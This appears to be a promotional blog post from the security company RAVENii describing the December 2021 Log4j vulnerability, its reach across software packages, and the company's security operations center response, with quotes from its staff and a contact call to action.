If network security is something you are responsible for, you’ve probably heard about Log4j vulnerabilities by now. Since its disclosure on 12/9/2021, the flaw in the widely used internet logging framework has had corporations and government officials struggling to get ahead of a vast network security threat to computer networks around the world.
Software developers utilize Log4j to document user activity and the behavior of applications. Because it is distributed for free by the Apache Software Foundation, Log4j is one of the most widely used frameworks for collecting information across computer networks, websites, and applications.
A spokesperson for Apache has stated that the way Log4j is inserted into various software makes it impossible to fully track the tool’s reach. As posted on the Google Blog December 17, 2021, “As a popular logging tool, Log4j is used by tens of thousands of software packages (known as artifacts in the Java ecosystem) and projects across the software industry. User’s lack of visibility into their dependencies and transitive dependencies has made patching difficult; it has also made it difficult to determine the full blast radius of this vulnerability.”
As of December 19th, there were over 17,000 packages affected, or roughly 4% of the ecosystem. That may seem like a small number, but considering that the average ecosystem impact of advisories that affect Maven Central is 2% and the median less than 0.1%, it is actually enormous.
“This Log4J vulnerability is a different beast,” says Jeff Shipley, RAVENii’s CEO. “It is a particularly nasty vector and it’s evolving faster than COVID as we are already on the 4th variant of patching. Staying on top of it is the key.”
The RAVENii SOC has been in constant communication with its clients making sure they are aware of what Log4j vulnerabilities are being discovered by the SOC’s security scans and 3rd Wave Artificial Intelligence tools.
For example, in one 24 hour time span the SOC detected 41 unique source/destination attempt queries and the use of the impacted Log4j string in one client’s environment. The SOC Team then worked with the client to identify which specific IPs they wanted to be monitored and labeled for additional security.
“We have a lot of concerned businesses asking us ’Is there a test specific to Log4j that will identify vulnerabilities and help prioritize mitigation and remediation efforts?’ We’re suggesting to everyone to start with a vulnerability scan of your external facing IPs as that is your biggest risk,” says Travis Salsbury, RAVENii’s Security Operations Center Manager.
“Our Security Operations Center Team is constantly threat hunting for Zero-Day extortions and anomalies on behalf of our clients,” says Salsbury, “so our internal process on how we monitor, identify, notify, and remediate did not change because of the Log4j vulnerability. Having said that, we have been significantly busier because we continue to find it in different variants in different environments.”
For more information about Log4j or any other network security concerns, click here or call (844) 317-0944.